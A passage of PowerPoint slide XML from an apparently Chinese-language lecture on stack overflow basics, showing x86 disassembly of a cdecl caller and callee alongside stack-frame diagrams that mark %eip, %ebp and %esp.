            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="420" name="Shape 420"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="421" name="Shape 421"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565AF0BD-E077-45F1-9FD5-22BB2F0B9EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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97CE35D2-4496-4090-A2A7-395E6301BD02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 427"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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28" name="Shape 428"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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29" name="Shape 429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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30" name="Shape 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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31" name="Shape 431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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32" name="Shape 432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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33" name="Shape 433"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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34" name="Shape 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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35" name="Shape 435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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3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36" name="Shape 436"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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2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37" name="Shape 437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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1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38" name="Shape 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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39" name="Shape 439"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="440" name="Shape 440"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="441" name="Shape 441"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="442" name="Shape 442"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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443" name="Shape 443"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="5074141"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Shape 444"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="445" name="Shape 445"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>
              <a:ext cx="484800" cy="6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446" name="Shape 446"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3118381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="447" name="Shape 447"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="448" name="Shape 448"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FD0419D-8754-4296-AA37-E6FDE7B750D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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73C862F3-FDF8-453E-AFF3-206897AD4818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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55" name="Shape 455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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56" name="Shape 456"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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57" name="Shape 457"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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58" name="Shape 458"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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59" name="Shape 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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60" name="Shape 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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61" name="Shape 461"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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62" name="Shape 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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63" name="Shape 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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64" name="Shape 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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65" name="Shape 465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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66" name="Shape 466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="467" name="Shape 467"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="468" name="Shape 468"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="469" name="Shape 469"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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470" name="Shape 470"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3321581"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="471" name="Shape 471"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="472" name="Shape 472"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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473" name="Shape 473"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
